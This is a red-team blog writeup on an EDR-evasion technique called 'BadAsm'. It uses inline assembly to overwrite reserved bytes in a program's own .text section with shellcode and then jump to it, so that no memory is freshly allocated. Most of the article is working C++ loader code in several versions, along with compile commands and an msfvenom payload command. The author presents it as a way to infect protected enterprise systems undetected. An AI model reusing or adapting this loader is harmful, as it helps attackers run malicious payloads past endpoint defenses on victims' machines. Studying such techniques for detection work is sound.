TTPs: BadAsm

In this writeup we use inline assembly to overwrite part of our program's .text section and achieve non-standard payload self-injection and execution.

Part One: Introduction

If you're at all familiar with malware development, you know that most malware delivers payloads from remote servers via some implementation of memory allocation -> memory writing -> code execution. As discussed in my JmpNoCall article, this frequently results in API calls returning to unbacked RX or RWX regions of memory. Because this is almost always anomalous or malicious behavior, advanced EDR/AV products flag or block it, rendering most primitive implant implementations useless.

In this article I will propose a technique that overwrites the standard .text section of our implant at runtime in order to execute code from a "known" area of memory. We’re going to use inline assembly to get some addresses, overwrite sacrificial instructions, and ultimately execute some malicious code in a modern EDR environment that blocks typical memory execution.

Note: A lot of what we're doing here is very memory unsafe, so you might have to tweak the assembly and payloads used in this writeup to achieve successful execution.

Part Two: Getting Started

We can use the following code to get started:

//x86_64-w64-mingw32-g++.exe main.cpp -o bad_asm.exe -masm=intel -Oz

#include <stdio.h>
#include <Windows.h>

asm("WriteHere:;"				// Beginning of our section of memory
	"nop;"					// sacrificial bytes we're going to overwrite
	"jmp ReturnHere;");			// return to main()

int main(void){
	DWORD oldProtect = PAGE_EXECUTE;
	LPVOID overwriteAddress = NULL;
	
	// predetermined MAX value of payload size
	SIZE_T payloadSize = 0x1;
	
	// payload
	BYTE payload[] = {0xcc};
	
	// get address of sacrificial bytes
	asm("lea %0, [rip+WriteHere];"
	: "=r" (overwriteAddress)
	:
	:
	);
	
	// we can skip VirtualAlloc because we have pre-allocated the memory above
	VirtualProtect(overwriteAddress, payloadSize, PAGE_EXECUTE_READWRITE, &oldProtect);
	
	// overwrite our sacrificial instructions
	RtlMoveMemory(overwriteAddress, payload, payloadSize);
	
	// jmp to our payload
	asm("jmp WriteHere;");
	
	// return to our implant
	asm("ReturnHere:;");
	printf("Successful execution!\n");
	
	return 0;
}

Now that we have a pretty clear idea of what we want to happen, let's compile the code and run it inside x64dbg.

We see that we successfully hit our interrupt instruction (the 0xcc byte we wrote).

And if we follow that instruction in our memory map, we can see that our payload is in the .text section of memory.

We can even see that if we execute our payload to termination, it returns to main and continues execution like we expect.

Part Three: A proper payload

For this to work with a real payload, we'll have to pre-allocate a larger sacrificial area in our .text section. We can generate the filler bytes with some command line python code:

python -c "print(',0x90'*500)"

If we want to use an msfvenom payload, our code should look something like this:

//x86_64-w64-mingw32-g++.exe main.cpp -o bad_asm.exe -masm=intel -Oz
#include <stdio.h>
#include <Windows.h>

asm("WriteHere:;");			// Beginning of our section of memory
					// sacrificial bytes we're going to overwrite, python -c "print(',0x90'*500)"
asm(".byte [...snip...]");
asm("jmp ReturnHere;");			// return to main()

int main(void){
	DWORD oldProtect = PAGE_EXECUTE;
	LPVOID overwriteAddress = NULL;
	
	// payload : 332 bytes
	// msfvenom -p windows/x64/exec EXITFUNC=none CMD=calc.exe -f c -a x64
	BYTE payload[] ={[...snip...]};
	
	// predetermined MAX value of payload size, minus one to avoid copying a null-byte
	SIZE_T payloadSize = sizeof(payload);
	
	// get address of sacrificial bytes
	asm("lea %0, [rip+WriteHere];"
	: "=r" (overwriteAddress)
	:
	:
	);
	
	// we can skip VirtualAlloc because we have pre-allocated the memory above
	VirtualProtect(overwriteAddress, payloadSize, PAGE_EXECUTE_READWRITE, &oldProtect);
	
	// overwrite our sacrificial instructions
	memcpy(overwriteAddress, payload, payloadSize);
	
	
	// jmp to our payload
	asm("jmp WriteHere;");
	
	
	return 0;
}

And we get payload execution!

However, because we used an encoder, our payload needs RWX permissions to execute. Additionally, msfvenom payloads have a bad habit of not exiting nicely, which prevents implant recovery without low-level modifications.

An alternative is to use a slight variant of @boku's popcalc payload for better OPSEC and recoverable execution. We'll skip the discussion of that implementation, but the code is available on my GitHub.

Part Four: Better execution

Our better solution looks something like this:

//x86_64-w64-mingw32-g++.exe main.cpp -o bad_asm.exe -masm=intel -O0
#include <stdio.h>
#include <Windows.h>

asm("WriteHere:;");			// Beginning of our section of memory
					// sacrificial bytes we're going to overwrite, python -c "print(',0x90'*500)"
asm(".byte [...snip...]");
asm("jmp ReturnHere;");			// return to main()

int main(void){
	DWORD oldProtect = PAGE_EXECUTE;
	LPVOID overwriteAddress = NULL;
	
	// payload : 332 bytes
	// boku's popcalc, with an extra "pop rax" to make it work on my machine
	// https://github.com/boku7/x64win-DynamicNoNull-WinExec-PopCalc-Shellcode/blob/main/win-x64-DynamicKernelWinExecCalc.asm
	BYTE payload[] = [...snip...]";
	
	// predetermined MAX value of payload size
	SIZE_T payloadSize = sizeof(payload)-1;
	
	// get address of sacrificial bytes
	asm("lea %0, [rip+WriteHere];"
	: "=r" (overwriteAddress)
	:
	:
	);
	
	// we can skip VirtualAlloc because we have pre-allocated the memory above
	VirtualProtect(overwriteAddress, payloadSize, PAGE_EXECUTE_READWRITE, &oldProtect);
	
	// overwrite our sacrificial instructions
	memcpy(overwriteAddress, payload, payloadSize);
	
	// restore permissions
	VirtualProtect(overwriteAddress, payloadSize, oldProtect, &oldProtect);
	
	// jmp to our payload
	asm("jmp WriteHere;");
	
	// return to our implant
	asm("ReturnHere:;");
	printf("Successful execution!\n");
	
	return 0;
}

Part Five: ???

[Intentionally left blank]

Part Six: Profit

Part Six: Conclusion

EDRs are very complex, and this is only one aspect of EDR detection that must be overcome in order to successfully infect protected enterprise-level systems. My testing showed that this technique avoided threat detection on some vendors, though achieving code execution proper is another matter. We did not implement any unhooking or more complex bypass techniques in this article, which is bound to leave us very vulnerable to detection.

This is the second article that I've written on the use of inline assembly in order to bypass protections. The granularity of control that can be achieved with inline assembly is a huge capability that is largely unexplored on x64 systems. This is probably due to the fact that Visual Studio does not support inline assembly for x64 or ARM architectures. In any case, inline assembly is a powerful capability that requires further research.

References

64bit Applications and Inline Assembly (Stack Overflow)

x64win-DynamicNoNull-WinExec-PopCalc-Shellcode/win-x64-DynamicKernelWinExecCalc.asm at main · boku7/x64win-DynamicNoNull-WinExec-PopCalc-Shellcode (GitHub)

Red_Team_Code_Snippets/Cpp/badAsm at main · 0xTriboulet/Red_Team_Code_Snippets (GitHub)
